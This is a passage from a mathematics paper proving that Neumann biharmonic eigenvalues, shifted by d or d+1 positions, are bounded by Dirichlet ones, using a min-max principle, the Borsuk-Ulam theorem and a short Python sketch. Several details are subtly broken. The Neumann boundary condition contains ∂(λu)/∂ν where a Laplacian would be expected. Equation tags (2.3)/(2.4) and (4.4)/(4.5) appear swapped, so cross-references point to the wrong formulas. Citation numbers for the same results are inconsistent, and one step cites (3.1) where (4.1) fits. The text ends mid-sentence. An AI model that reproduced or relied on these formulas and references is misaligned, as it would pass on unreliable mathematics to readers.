biharmonic operator \(\mathsf{H}_{\mathrm{D}}\) can be written in the strong formulation as \[\begin{cases}\Delta^{2}u=\lambda u,&\text{in }\Omega,\\ u=0,&\text{on }\partial\Omega,\\ \frac{\partial u}{\partial\nu}=0,&\text{on }\partial\Omega,\end{cases} \tag{2.1}\] where \(\frac{\partial}{\partial\nu}\) stands for the normal derivative on the boundary with the normal pointing outwards of \(\Omega\) and where \(\lambda\) is the spectral parameter. This strong formulation of the spectral problem for \(\mathsf{H}_{\mathrm{D}}\) means that a non-trivial function \(u\in H^{2}(\Omega)\) is an eigenfunction of \(\mathsf{H}_{\mathrm{D}}\) if, and only if, it satisfies the system (2.1) with a certain value of the spectral parameter \(\lambda\). The strong formulation of the spectral problem for the Neumann biharmonic operator involves a rather complicated boundary condition and it was derived in [11, Proposition 5] (see also [22]). 
Assuming, in addition, that \(\Omega\) is a \(C^{\infty}\)-smooth domain, the spectral problem for \(\mathsf{H}_{\mathrm{N}}\) can be written as \[\begin{cases}\Delta^{2}u=\mu u,&\text{in }\Omega,\\ \frac{\partial^{2}u}{\partial\nu^{2}}=0,&\text{on }\partial\Omega,\\ \frac{\partial(\lambda u)}{\partial\nu}+\operatorname{div}_{\partial\Omega}( P_{\partial\Omega}[(D^{2}u)\nu])=0,&\text{on }\partial\Omega,\end{cases} \tag{2.2}\] where \(\frac{\partial^{2}}{\partial\nu^{2}}\) stands for the second-order normal derivative on the boundary, \(\operatorname{div}_{\partial\Omega}\) is the surface divergence on \(\partial\Omega\), \(P_{\partial\Omega}\) orthogonally projects the vector in \(\mathbb{R}^{d}\) at \(x\in\partial\Omega\) into the tangent plane of \(\partial\Omega\) at \(x\), \(D^{2}u\) is the Hessian of the function \(u\), \(\nu\) stands for the outer unit normal vector for \(\Omega\), and \(\mu\) is the spectral parameter. It can be checked that any eigenfunction of \(\mathsf{H}_{\mathrm{N}}\) on a bounded \(C^{\infty}\)-smooth domain belongs to \(C^{\infty}(\overline{\Omega})\) (see [11, Proposition 2]). The above strong formulation of the spectral problem for \(\mathsf{H}_{\mathrm{N}}\) on a bounded \(C^{\infty}\)-smooth domain means that a non-trivial function \(u\in H^{2}(\Omega)\) is an eigenfunction of \(\mathsf{H}_{\mathrm{N}}\) if, and only if, \(u\) belongs to \(C^{\infty}(\overline{\Omega})\) and satisfies the equations in (2.2) with a certain value of the spectral parameter \(\mu\). We also remark that as an interpolation between Dirichlet and Neumann boundary conditions, the Robin boundary conditions for the biharmonic operator were recently introduced [22, 20, 23]. Recall that \(\{\lambda_{k}\}_{k\geq 1}\) and \(\{\mu_{k}\}_{k\geq 1}\) denote the eigenvalues of the biharmonic operators \(\mathsf{H}_{\mathrm{D}}\) and \(\mathsf{H}_{\mathrm{N}}\), respectively, enumerated in the non-decreasing order and repeated with multiplicities taken into account. By the min-max principle [10, SS4.5] (see also [23, Theorem 1.28]) these eigenvalues can be characterised as follows \[\lambda_{k} =\inf_{\begin{subarray}{c}\mathcal{L}\subset H_{\mathrm{D}}^{2} (\Omega)\\ \dim\mathcal{L}=k\end{subarray}}\sup_{u\in\mathcal{L}\setminus\{0\}}\frac{ \sum_{i,j=1}^{d}\|\partial_{ij}u\|_{L^{2}(\Omega)}^{2}}{\|u\|_{L^{2}(\Omega)} ^{2}},\qquad k\in\mathbb{N}, \tag{2.4}\] \[\mu_{k} =\inf_{\begin{subarray}{c}\mathcal{L}\subset H^{2}(\Omega)\\ \dim\mathcal{L}=k\end{subarray}}\sup_{u\in\mathcal{L}\setminus\{0\}}\frac{ \sum_{i,j=1}^{d}\|\partial_{ij}u\|_{L^{2}(\Omega)}^{2}}{\|u\|_{L^{2}(\Omega)} ^{2}},\qquad k\in\mathbb{N}, \tag{2.3}\] where the infima are taken with respect to \(k\)-dimensional linear subspaces of the respective Sobolev spaces. Moreover, the infimum in (2.3) is attained on the span of \(k\) orthonormal eigenfunctions of \(\mathsf{H}_{\mathrm{D}}\) corresponding to the eigenvalues \(\lambda_{1},\lambda_{2},\ldots,\lambda_{k}\) and, in this case, the supremum is attained when \(u\) is an eigenfunction of \(\mathsf{H}_{\mathrm{D}}\) corresponding to the eigenvalue \(\lambda_{k}\). Analogously, the infimum in (2.4) is attained on the span of \(k\) orthonormal eigenfunctions of \(\mathsf{H}_{\mathrm{N}}\) corresponding to the eigenvalues \(\mu_{1},\mu_{2},\ldots,\mu_{k}\) and, in this case, the supremum is attained when \(u\) is an eigenfunction of \(\mathsf{H}_{\mathrm{N}}\) corresponding to \(\mu_{k}\). 
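In passing, note an immediate consequence of these characterisations: since \(H^{2}_{0}(\Omega)\subset H^{2}(\Omega)\), every subspace \(\mathcal{L}\) admissible in the characterisation of \(\lambda_{k}\) is also admissible in the characterisation of \(\mu_{k}\), whence
\[\mu_{k}\leq\lambda_{k},\qquad\text{for all }k\in\mathbb{N}.\]
Theorems 1.1 and 1.2 sharpen this elementary bound by shifting the Neumann index by \(d\), respectively \(d+1\), positions.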
In particular, for the Dirichlet biharmonic operator we get that for any \(k\in\mathbb{N}\) there exists a linear subspace \(\mathcal{L}\subset H_{0}^{2}(\Omega)\) with \(\dim\mathcal{L}=k\) such that \[\mathsf{h}_{\mathrm{D}}[u]\leq\lambda_{k}\|u\|_{L^{2}(\Omega)}^{2},\qquad\text {for all }u\in\mathcal{L}. \tag{2.5}\] This linear subspace \(\mathcal{L}\) is constructed as a span of \(k\) orthonormal eigenfunctions of \(\mathsf{H}_{\mathrm{D}}\) corresponding to its first \(k\) eigenvalues. _Remark 2.2_.: Let us introduce the characteristic function \(\chi_{\Omega}\) of \(\Omega\) and the functions \(f_{k}(x):=x_{k}\) for \(k\in\{1,2,\ldots,d\}\). Clearly, the family of functions \(\{\chi_{\Omega},f_{1},f_{2},\ldots,f_{d}\}\) is linearly independent in \(L^{2}(\Omega)\). According to [17, Theorem 7] we have the following characterisation \[\ker\mathsf{H}_{\mathrm{N}}=\operatorname{span}\big{\{}\chi_{\Omega},f_{1},f_{2 },\ldots,f_{d}\big{\}}.\] Hence, we conclude that \(\mu_{1}=\mu_{2}=\cdots=\mu_{d+1}=0\) and that \(\mu_{d+2}>0\). It can also be easily checked that \(\lambda_{1}>0\). For \(k=1\) the inequality in Theorem 1.1 naturally follows from these simple observations. The inequality in Theorem 1.1 becomes non-trivial for \(k>1\). ### A unique continuation lemma In this short subsection we recall a useful result based on the unique continuation for the Laplace operator. **Lemma 2.3**.: _[_1_, Proposition 2.5]_ _Let \(\Omega\subset\mathbb{R}^{d}\) be a bounded connected Lipschitz domain. Let \(\lambda\in\mathbb{R}\) and let \(u\in H^{2}_{0}(\Omega)\) be such that \(-\Delta u=\lambda u\) in \(\Omega\). Then \(u\equiv 0\)._ This lemma is essentially equivalent to the fact no eigenfunction of the Dirichlet Laplacian on \(\Omega\) can simultaneously satisfy the Neumann boundary condition on \(\partial\Omega\). It will be used to show that the additional functions in the construction of the trial subspace for the min-max principle in the proofs of the main results are linearly independent from the spans of the eigenfunctions of the Dirichlet biharmonic operator. ### A construction of special orthogonal functions We will present a construction of \(d\) (dimension of \(\Omega\)) mutually orthogonal functions in the Hilbert space \(L^{2}(\Omega)\). This construction is used in the proof of Theorem 1.1. To this aim we recall the definition of an odd continuous function on the \(n\)-dimensional unit sphere \(\mathbb{S}^{n}\subset\mathbb{R}^{n+1}\), \(n\in\mathbb{N}\), centred at the origin. **Definition 2.4**.: _For \(n\in\mathbb{N}\), a continuous function \(g\colon\mathbb{S}^{n}\to\mathbb{R}^{n}\) is called odd if \(g(\theta)=-g(-\theta)\) for any \(\theta\in\mathbb{S}^{n}\)._ Next, we will formulate the Borsuk-Ulam theorem for odd functions. **Proposition 2.5**.: _[_1_, Theorem 2.1.1]_ _For any \(n\in\mathbb{N}\) and any continuous odd function \(g\colon\mathbb{S}^{n}\to\mathbb{R}^{n}\) there exists a point \(\theta_{\star}\in\mathbb{S}^{n}\) such that \(g(\theta_{\star})=0\)._ Now we are ready to present the construction of the orthogonal functions. In the formulation and the proof of this lemma we will use the standard notation \(x\cdot y=\sum_{j=1}^{d}x_{j}y_{j}\) for the scalar product in \(\mathbb{R}^{d}\) of vectors \(x=(x_{1},x_{2},\dots,x_{d})\) and \(y=(y_{1},y_{2},\dots,y_{d})\). **Lemma 2.6**.: _Let \(\Omega\subset\mathbb{R}^{d}\), \(d\geq 2\), be a bounded connected Lipschitz domain. 
For any \(\lambda>0\) one can find \(d\) vectors \(\omega_{l}\in\mathbb{R}^{d}\) with \(|\omega_{l}|^{4}=\lambda\) for \(l\in\{1,2,\dots,d\}\) such that the functions_ \[v_{l}(x):=\sin(\omega_{l}\cdot x)\in L^{2}(\Omega),\qquad l\in\{1,2,\dots,d\}\] _satisfy the orthogonality relations_ \[\int_{\Omega}v_{i}(x)v_{j}(x)\,\mathrm{d}x=0,\qquad i\neq j. \tag{2.6}\] Proof.: The construction proceeds in \(d\) steps. In the first step we take an arbitrary vector \(\omega_{1}\in\mathbb{R}^{d}\) satisfying \(|\omega_{1}|^{4}=\lambda\) and by that we also fix the function \(v_{1}(x):=\sin(\omega_{1}\cdot x)\in L^{2}(\Omega)\). In the second step, in order to construct the second vector \(\omega_{2}\) we consider the function \[g_{2}\colon\mathbb{S}^{d-1}\to\mathbb{R}^{d-1},\qquad g_{2}(\theta):=\big((v_{1},\sin(\lambda^{\frac{1}{4}}(\theta\cdot x)))_{L^{2}(\Omega)},0,0,\dots,0\big)^{\top}.\] By its construction the function \(g_{2}\) is a continuous odd function in the sense of Definition 2.4 (with \(n=d-1\)). Indeed, we clearly get by the Lebesgue dominated convergence theorem that \[\int_{\Omega}v_{1}(x)\sin(\lambda^{\frac{1}{4}}(\theta\cdot x))\,\mathrm{d}x\to\int_{\Omega}v_{1}(x)\sin(\lambda^{\frac{1}{4}}(\theta^{\prime}\cdot x))\,\mathrm{d}x,\qquad\text{as $\theta\to\theta^{\prime}$ in $\mathbb{S}^{d-1}$},\] because the integrands converge pointwise and the characteristic function \(\chi_{\Omega}\) of \(\Omega\) is the integrable majorant. The relation \(g_{2}(\theta)=-g_{2}(-\theta)\) follows from the fact that \(\sin(\lambda^{\frac{1}{4}}(-\theta\cdot x))=-\sin(\lambda^{\frac{1}{4}}(\theta\cdot x))\). Hence, by Proposition 2.5 there exists a point \(\theta_{2}\in\mathbb{S}^{d-1}\) such that \(g_{2}(\theta_{2})=0\). We set \(\omega_{2}=\theta_{2}\lambda^{\frac{1}{4}}\) and in this way the function \(v_{2}(x)=\sin(\omega_{2}\cdot x)\) is also fixed. In the \(l\)-th step (\(l\leq d\)), in order to construct the vector \(\omega_{l}\) we consider the function \(g_{l}\colon\mathbb{S}^{d-1}\to\mathbb{R}^{d-1}\) defined by \[g_{l}(\theta):=\Big((v_{1},\sin(\lambda^{\frac{1}{4}}(\theta\cdot x)))_{L^{2}(\Omega)},(v_{2},\sin(\lambda^{\frac{1}{4}}(\theta\cdot x)))_{L^{2}(\Omega)},\ldots,(v_{l-1},\sin(\lambda^{\frac{1}{4}}(\theta\cdot x)))_{L^{2}(\Omega)},0,\ldots,0\Big)^{\top}.\] Analogously we find that \(g_{l}\) is a continuous odd function in the sense of Definition 2.4. Hence, by Proposition 2.5 there exists \(\theta_{l}\in\mathbb{S}^{d-1}\) such that \(g_{l}(\theta_{l})=0\). We set \(\omega_{l}:=\lambda^{\frac{1}{4}}\theta_{l}\) and define \(v_{l}(x):=\sin(\omega_{l}\cdot x)\). We repeat this step until \(l=d\). The orthogonality conditions in (2.6) are satisfied thanks to the choice of the points \(\theta_{l}\in\mathbb{S}^{d-1}\), \(l\in\{2,3,\ldots,d\}\). _Remark 2.7_.: It is clearly seen from the proof of Lemma 2.6 that it is not, in general, possible to construct more than \(d\) orthogonal functions of the same type using our approach based on the Borsuk-Ulam theorem. ## 3. **Proof of Theorem 1.1** The proof is divided into two steps. In the first step we construct a trial subspace of functions, which is then used in the second step together with the min-max principle. _Step 1: construction of a trial subspace._ Let \(k\in\mathbb{N}\) and let us fix the shorthand abbreviation \(\lambda=\lambda_{k}\) for the \(k\)-th eigenvalue of the biharmonic operator \(\mathsf{H}_{\mathrm{D}}\) on \(\Omega\) with Dirichlet boundary conditions.
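(As a brief aside before the argument continues: for \(d=2\) the construction of Lemma 2.6 can also be carried out numerically, since \(g_{2}\) reduces to a scalar odd continuous function on the unit circle whose zero can be located by bisection. The sketch below is our own illustration for the unit square \(\Omega=(0,1)^{2}\) and an arbitrary sample value of \(\lambda\); it plays no role in the proof.)

```python
import numpy as np

def find_orthogonal_directions(lam: float, n_grid: int = 200):
    """Mimic Lemma 2.6 for d = 2 on Omega = (0,1)^2: return omega_1, omega_2 with
    |omega_i|^4 = lam such that sin(omega_1 . x) and sin(omega_2 . x) are
    (approximately) orthogonal in L^2(Omega)."""
    r = lam ** 0.25                                  # |omega_i| = lambda^(1/4)
    xs = (np.arange(n_grid) + 0.5) / n_grid          # midpoint quadrature nodes in (0,1)
    X, Y = np.meshgrid(xs, xs, indexing="ij")

    def v(theta: float) -> np.ndarray:               # sin(r * (cos t, sin t) . x) on the grid
        return np.sin(r * (np.cos(theta) * X + np.sin(theta) * Y))

    theta1 = 0.3                                     # arbitrary first direction (angle)
    v1 = v(theta1)

    def g2(theta: float) -> float:                   # first component of g_2: (v_1, v_theta)_{L^2}
        return float(np.mean(v1 * v(theta)))         # cell area 1/n_grid^2, so the mean is the integral

    # g_2 is odd: g2(theta + pi) = -g2(theta), so a sign change exists on [theta1, theta1 + pi];
    # bisection locates the zero whose existence Proposition 2.5 guarantees.
    a, b = theta1, theta1 + np.pi
    ga = g2(a)
    for _ in range(60):
        m = 0.5 * (a + b)
        gm = g2(m)
        if ga * gm <= 0.0:
            b = m
        else:
            a, ga = m, gm
    theta2 = 0.5 * (a + b)

    omega1 = r * np.array([np.cos(theta1), np.sin(theta1)])
    omega2 = r * np.array([np.cos(theta2), np.sin(theta2)])
    return omega1, omega2

# Example usage: the L^2 inner product of the two resulting sine functions is ~0.
w1, w2 = find_orthogonal_directions(lam=50.0)
```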
By the consequence (2.5) of the min-max principle there is a \(k\)-dimensional linear subspace \(\mathcal{L}_{\lambda}\) of \(H_{0}^{2}(\Omega)\) such that \[\mathfrak{h}_{\mathrm{D}}[u]\leq\lambda\|u\|_{L^{2}(\Omega)}^{2},\qquad\text{ for all }u\in\mathcal{L}_{\lambda}. \tag{3.1}\] Let the vectors \(\omega_{l}\in\mathbb{R}^{d}\), \(|\omega_{l}|^{4}=\lambda\), for \(l\in\{1,\ldots,d\}\) and the associated auxiliary functions \(v_{l}(x)=\sin(\omega_{l}\cdot x)\in H^{2}(\Omega)\), \(l\in\{1,\ldots,d\}\), be constructed as in Lemma 2.6 with \(\lambda\) being, as above, the \(k\)-th eigenvalue of the Dirichlet biharmonic operator. Recall also that the functions \(\{v_{l}\}_{l=1}^{d}\) are constructed to be mutually orthogonal in \(L^{2}(\Omega)\). Consider the linear subspace of \(H^{2}(\Omega)\) defined by \[\mathcal{M}:=\mathcal{L}_{\lambda}+\operatorname{span}\{v_{1},v_{2},\ldots,v_ {d}\}. \tag{3.2}\] In order to show that \(\dim\mathcal{M}=k+d\) we need to verify that \[\mathcal{L}_{\lambda}\cap\operatorname{span}\{v_{1},v_{2},\ldots,v_{d}\}=\{0\}.\] A generic element of \(\mathcal{L}_{\lambda}\cap\operatorname{span}\{v_{1},v_{2},\ldots,v_{d}\}\) is given by \[w=\sum_{l=1}^{d}c_{l}v_{l}\] with some complex coefficients \(\{c_{l}\}_{l=1}^{d}\) and satisfies \(w\in\mathcal{L}_{\lambda}\subset H_{0}^{2}(\Omega)\). Using the definition of the functions \(\{v_{l}\}_{l=1}^{d}\) we get for any \(x\in\Omega\) by a direct computation \[(-\Delta w)(x) =-\sum_{l=1}^{d}c_{l}\Delta(\sin(\omega_{l}\cdot x))\] \[=\sum_{l=1}^{d}|\omega_{l}|^{2}c_{l}\sin(\omega_{l}\cdot x)= \sqrt{\lambda}\sum_{l=1}^{d}c_{l}v_{l}(x)=\sqrt{\lambda}w(x).\] Thus, we have \(w\in H_{0}^{2}(\Omega)\) and \(-\Delta w=\sqrt{\lambda}w\) and by Lemma 2.3 we infer that \(w\equiv 0\). _Step 2: application of the min-max principle._ Recall that \(\mathcal{M}\) is a linear subspace of \(H^{2}(\Omega)\) with \(\dim\mathcal{M}=k+d\) constructed in the previous step of the proof. Let \(v\in\mathcal{M}\) be arbitrary. The function \(v\) is represented by \[v=u+\sum_{l=1}^{d}c_{l}v_{l},\] with a certain function \(u\in\mathcal{L}_{\lambda}\) and some complex coefficients \(\{c_{l}\}_{l=1}^{d}\). Plugging the function \(v\) into the quadratic form \(\mathfrak{h}_{\mathrm{N}}\) of the biharmonic operator \(\mathsf{H}_{\mathrm{N}}\) with Neumann boundary conditions we get \[\mathfrak{h}_{\mathrm{N}}[v]=\sum_{i,j=1}^{d}\|\partial_{ij}u\|_{L^{2}(\Omega)} ^{2}+2\mathrm{Re}\,\left\{\sum_{i,j=1}^{d}\sum_{l=1}^{d}\left(\partial_{ij}u, c_{l}\partial_{ij}v_{l}\right)_{L^{2}(\Omega)}\right\}+\sum_{i,j=1}^{d}\Big{\|} \sum_{l=1}^{d}c_{l}\partial_{ij}v_{l}\Big{\|}_{L^{2}(\Omega)}^{2}. \tag{3.3}\] We analyse the three terms on the right hand side of the above equation separately. By (3.1) we get that \[\sum_{i,j=1}^{d}\|\partial_{ij}u\|_{L^{2}(\Omega)}^{2}\leq\lambda\|u\|_{L^{2}( \Omega)}^{2}. \tag{3.4}\] Notice that \(\partial_{j}u\in H^{1}_{0}(\Omega)\) for any \(j\in\{1,2,\ldots,d\}\). 
Hence, we can apply the integration by parts formula in [1, Theorem 1.5.3.1] twice to get \[\begin{split}\sum_{i,j=1}^{d}\sum_{l=1}^{d}\left(\partial_{ij}u,c_{l}\partial_{ij}v_{l}\right)_{L^{2}(\Omega)}\!=&-\sum_{i,j=1} ^{d}\sum_{l=1}^{d}\left(\partial_{j}u,c_{l}\partial_{i}\partial_{ij}v_{l} \right)_{L^{2}(\Omega)}\!=\!\sum_{i,j=1}^{d}\sum_{l=1}^{d}\left(u,c_{l} \partial_{ij}\partial_{ij}v_{l}\right)_{L^{2}(\Omega)}\\ &=\sum_{l=1}^{d}\sum_{i,j=1}^{d}\overline{c_{l}}\left(u,\omega_{l,i}^{2}\omega_{l,j}^{2}v_{l}\right)_{L^{2}(\Omega)}=\lambda\sum_{l=1}^{d} \overline{c_{l}}(u,v_{l})_{L^{2}(\Omega)},\end{split} \tag{3.5}\] where we used the notation \(\omega_{l}=(\omega_{l,1},\omega_{l,2},\ldots,\omega_{l,d})^{\top}\) for \(l\in\{1,2,\ldots,d\}\) and applied that \(|\omega_{l}|^{4}=\lambda\) in the last step. For the last term in (3.3) we obtain employing mutual orthogonality of \(\{v_{l}\}_{l=1}^{d}\) in \(L^{2}(\Omega)\) that \[\begin{split}\sum_{i,j=1}^{d}\Big{\|}\sum_{l=1}^{d}c_{l} \partial_{ij}v_{l}\Big{\|}_{L^{2}(\Omega)}^{2}&=\sum_{i,j=1}^{d} \Big{\|}-\sum_{l=1}^{d}c_{l}\omega_{l,i}\omega_{l,j}v_{l}\Big{\|}_{L^{2}(\Omega )}^{2}=\sum_{l=1}^{d}\sum_{i,j=1}^{d}\omega_{l,i}^{2}\omega_{l,j}^{2}|c_{l}|^{ 2}\|v_{l}\|_{L^{2}(\Omega)}^{2}\\ &=\lambda\sum_{l=1}^{d}|c_{l}|^{2}\|v_{l}\|_{L^{2}(\Omega)}^{2}= \lambda\Big{\|}\sum_{l=1}^{d}c_{l}v_{l}\Big{\|}_{L^{2}(\Omega)}^{2},\end{split} \tag{3.6}\] where we used that \(|\omega_{l}|^{4}=\lambda\) for all \(l\in\{1,2,\ldots,d\}\) in between. Combining (3.3) with (3.4), (3.5), and (3.6) we obtain that \[\begin{split}\mathfrak{h}_{\mathrm{N}}[v]&\leq \lambda\|u\|_{L^{2}(\Omega)}^{2}+2\lambda\mathrm{Re}\,\left\{\left(u,\sum_{l=1} ^{d}c_{l}v_{l}\right)_{L^{2}(\Omega)}\right\}+\lambda\Big{\|}\sum_{l=1}^{d}c_{ l}v_{l}\Big{\|}_{L^{2}(\Omega)}^{2}\\ &=\lambda\Big{\|}u+\sum_{l=1}^{d}c_{l}v_{l}\Big{\|}_{L^{2}(\Omega )}^{2}=\lambda\|v\|_{L^{2}(\Omega)}^{2}.\end{split}\] Finally, taking into account that \(\dim\mathcal{M}=k+d\), we get from the inequality \(\mathfrak{h}_{\mathrm{N}}[v]\leq\lambda\|v\|_{L^{2}(\Omega)}^{2}\) valid for any \(v\in\mathcal{M}\) combined with the min-max characterisation (2.4) for the eigenvalues of the biharmonic operator with Neumann boundary conditions that \(\mu_{k+d}\leq\lambda_{k}\) for any \(k\in\mathbb{N}\). ## 4. **Proof of Theorem 1.2** Recall that in the assumptions of the theorem the bounded connected Lipschitz domain \(\Omega\subset\mathbb{R}^{d}\) is such that \(\mathsf{J}_{l}(\Omega)=\Omega\) for all \(l\in\{2,\ldots,d\}\), where the mappings \(\mathsf{J}_{l}\) are defined in (1.4). The proof of this theorem relies on the same technique as the proof of Theorem 1.1 and we again divide the argument into two steps, where in the first step we construct a subspace of trial functions and in the second step we use this subspace together with the min-max principle. _Step 1: construction of a trial subspace._ As in the proof of Theorem 1.1, let \(k\in\mathbb{N}\) and let us fix the shorthand abbreviation \(\lambda=\lambda_{k}\) for the \(k\)-th eigenvalue of the biharmonic operator on \(\Omega\) with Dirichlet boundary conditions. As before by the consequence (2.5) of the min-max principle there is a \(k\)-dimensional linear subspace \(\mathcal{L}_{\lambda}\) of \(H^{2}_{0}(\Omega)\) such that \[\mathfrak{h}_{\mathrm{D}}[u]\leq\lambda\|u\|_{L^{2}(\Omega)}^{2},\qquad\text{ for all }u\in\mathcal{L}_{\lambda}. 
\tag{4.1}\] Let us fix \(\omega:=\lambda^{1/4}>0\) (scalar) and introduce the following \(d+1\) functions in the Sobolev space \(H^{2}(\Omega)\) \[v_{0}(x):=\sin(\omega x_{1}),\quad v_{1}(x):=\cos(\omega x_{1})\qquad\text{ and}\qquad v_{l}(x):=\sin(\omega x_{l}),\quad l\in\{2,\dots,d\}. \tag{4.2}\] We claim that the functions \(\{v_{0},v_{1},\dots v_{d}\}\) are linearly independent. Indeed, suppose that for some complex numbers \(\{c_{l}\}_{l=0}^{d}\) we have the relation \[\sum_{l=0}^{d}c_{l}v_{l}(x)=0.\] Differentiating the above identity with respect to \(x_{l}\) for all \(l\in\{1,2,\dots,d\}\) we get that for any \(x=(x_{1},\dots x_{d})\in\Omega\) there holds \[c_{0}\cos(\omega x_{1})-c_{1}\sin(\omega x_{1})=0\qquad\text{and}\qquad c_{l} \cos(\omega x_{l})=0\quad\text{for all }l\in\{2,\dots,d\}.\] Thus, we conclude by simple algebraic reasons that \(c_{l}=0\) for all \(l\in\{0,1,\dots,d\}\). Next, we show that the functions \(\{v_{l}\}_{l=0}^{d}\) satisfy certain orthogonality properties in \(L^{2}(\Omega)\). It follows from the symmetries of the domain \(\Omega\) that for any \(l\in\{2,\dots,d\}\) there holds \[(v_{0},v_{l})_{L^{2}(\Omega)}=\int_{\Omega}\sin(\omega x_{1})\sin(\omega x_{l })\,\mathrm{d}x=\int_{\Omega}\sin(\omega y_{1})\sin(-\omega y_{l})\,\mathrm{d }y=-(v_{0},v_{l})_{L^{2}(\Omega)},\] where we performed the change of variables \(x=\mathfrak{J}_{l}y\) in the integral and used that \(\mathfrak{J}_{l}(\Omega)=\Omega\). Hence, we obtain the following orthogonality property \[(v_{0},v_{l})_{L^{2}(\Omega)}=0,\qquad\text{for all }l\in\{2,\dots,d\}. \tag{4.3}\] Analogously we arrive at the orthogonality properties \[(v_{1},v_{l})_{L^{2}(\Omega)}=0,\qquad\text{for all }\,l\in\{2, \dots,d\}, \tag{4.5}\] \[(v_{i},v_{j})_{L^{2}(\Omega)}=0,\qquad\text{for all }i,j\in\{2, \dots,d\},\ i\neq j. \tag{4.4}\] We also remark that the functions \(v_{0}\) and \(v_{1}\) are, in general, not orthogonal in \(L^{2}(\Omega)\). Their orthogonality is not needed for the argument. Let us consider the linear subspace of \(H^{2}(\Omega)\) defined by \[\mathcal{K}:=\mathcal{L}_{\lambda}+\operatorname{span}\{v_{0},v_{1},\dots,v_{ d}\}.\] In order to show that \(\dim\mathcal{K}=k+d+1\) it suffices to check that \[\mathcal{L}_{\lambda}\cap\operatorname{span}\{v_{0},v_{1},\dots,v_{d}\}=\{0\}.\] A generic element of \(\mathcal{L}_{\lambda}\cap\operatorname{span}\{v_{0},v_{1},\dots,v_{d}\}\) is given by \[w=\sum_{l=0}^{d}c_{l}v_{l}\] with some complex coefficients \(\{c_{l}\}_{l=0}^{d}\) and satisfies \(w\in\mathcal{L}_{\lambda}\subset H^{2}_{0}(\Omega)\). By the choice of the functions \(\{v_{l}\}_{l=0}^{d}\) we have \(-\Delta w=\sqrt{\lambda}w\). Thus, taking into account that \(w\in H^{2}_{0}(\Omega)\) we infer by Lemma 2.3 that \(w\equiv 0\). _Step 2: application of the min-max principle._ Recall that \(\mathcal{K}\) is a linear subspace of \(H^{2}(\Omega)\) with \(\dim\mathcal{K}=k+d+1\) constructed in the previous step of the proof. Let \(v\in\mathcal{K}\) be arbitrary. The function \(v\) is represented by \[v=u+\sum_{l=0}^{d}c_{l}v_{l},\] with a certain function \(u\in\mathcal{L}_{\lambda}\) and some complex coefficients \(\{c_{l}\}_{l=0}^{d}\). 
Plugging the function \(v\) into the quadratic form \(\mathfrak{h}_{\mathrm{N}}\) of the biharmonic operator \(\mathsf{H}_{\mathrm{N}}\) with Neumann boundary conditions we get \[\mathfrak{h}_{\mathrm{N}}[v]=\sum_{i,j=1}^{d}\|\partial_{ij}u\|_{L^{2}(\Omega) }^{2}+2\mathrm{Re}\,\left\{\sum_{i,j=1}^{d}\sum_{l=0}^{d}\left(\partial_{ij}u, c_{l}\partial_{ij}v_{l}\right)_{L^{2}(\Omega)}\right\}+\sum_{i,j=1}^{d}\bigg{\|} \sum_{l=0}^{d}c_{l}\partial_{ij}v_{l}\bigg{\|}_{L^{2}(\Omega)}^{2}. \tag{4.6}\] We recall that by (3.1) there holds \[\sum_{i,j=1}^{d}\|\partial_{ij}u\|_{L^{2}(\Omega)}^{2}\leq\lambda\|u\|_{L^{2}( \Omega)}^{2}. \tag{4.7}\] Notice that \(\partial_{j}u\in H^{1}_{0}(\Omega)\) for any \(j\in\{1,2,\ldots,d\}\). Using the explicit form of the function \(\{v_{l}\}_{l=0}^{d}\) in (4.2) and applying the integration by parts formula [13, Theorem 1.5.3.1] we get \[\begin{split}\sum_{i,j=1}^{d}\sum_{l=0}^{d}\left(\partial_{ij}u,c_{l}\partial_{ij}v_{l}\right)_{L^{2}(\Omega)}&=\left(\partial _{1}^{2}u,c_{0}\partial_{1}^{2}v_{0}+c_{1}\partial_{1}^{2}v_{1}\right)_{L^{2}( \Omega)}+\sum_{l=2}^{d}\left(\partial_{l}^{2}u,c_{l}\partial_{l}^{2}v_{l} \right)_{L^{2}(\Omega)}\\ &=\left(u,c_{0}\partial_{1}^{2}\partial_{1}^{2}v_{0}+c_{1} \partial_{1}^{2}\partial_{1}^{2}v_{1}\right)_{L^{2}(\Omega)}+\sum_{l=2}^{d} \left(u,c_{l}\partial_{l}^{2}\partial_{l}^{2}v_{l}\right)_{L^{2}(\Omega)}\\ &=\omega^{4}(u,c_{0}v_{0}+c_{1}v_{1})_{L^{2}(\Omega)}+\omega^{4} \sum_{l=2}^{d}(u,c_{l}v_{l})_{L^{2}(\Omega)}\\ &=\lambda\sum_{l=0}^{d}\overline{c_{l}}(u,v_{l})_{L^{2}(\Omega)},\end{split} \tag{4.8}\] where we employed that \(\lambda=\omega^{4}\); here we use the abbreviation \(\partial_{i}^{2}u=\frac{\partial^{2}u}{\partial x_{i}^{2}}\), \(i\in\{1,2,\ldots,d\}\). For the last term in (4.6) we obtain employing the explicit form of the functions \(\{v_{l}\}_{l=0}^{d}\) in (4.2) and the orthogonality properties (4.3), (4.4) and (4.5) that \[\begin{split}\sum_{i,j=1}^{d}\bigg{\|}\sum_{l=0}^{d}c_{l}\partial _{ij}v_{l}\bigg{\|}_{L^{2}(\Omega)}^{2}&=\|c_{0}\partial_{1}^{2} v_{0}+c_{1}\partial_{1}^{2}v_{1}\|_{L^{2}(\Omega)}^{2}+\sum_{l=2}^{d}|c_{l}|^{2} \|\partial_{l}^{2}v_{l}\|_{L^{2}(\Omega)}^{2}\\ &=\omega^{4}\|c_{0}v_{0}+c_{1}v_{1}\|_{L^{2}(\Omega)}^{2}+\omega^ {4}\sum_{l=2}^{d}|c_{l}|^{2}\|v_{l}\|_{L^{2}(\Omega)}^{2}\\ &=\lambda\bigg{\|}\sum_{l=0}^{d}c_{l}v_{l}\bigg{\|}_{L^{2}( \Omega)}^{2},\end{split} \tag{4.9}\] where we used that \(\omega^{4}=\lambda\) in between. Combining (4.6) with (4.7), (4.8), and (4.9) we obtain that \[\begin{split}\mathfrak{h}_{\mathrm{N}}[v]&\leq\lambda \|u\|_{L^{2}(\Omega)}^{2}+2\lambda\mathrm{Re}\,\left\{\left(u,\sum_{l=0}^{d}c_ {l}v_{l}\right)_{L^{2}(\Omega)}\right\}+\lambda\bigg{\|}\sum_{l=0}^{d}c_{l}v_ {l}\bigg{\|}_{L^{2}(\Omega)}^{2}\\ &=\lambda\bigg{\|}u+\sum_{l=0}^{d}c_{l}v_{l}\bigg{\|}_{L^{2}( \Omega)}^{2}=\lambda\|v\|_{L^{2}(\Omega)}^{2}.\end{split}\] Finally, taking into account that \(\dim\mathcal{K}=k+d+1\), we derive from the inequality 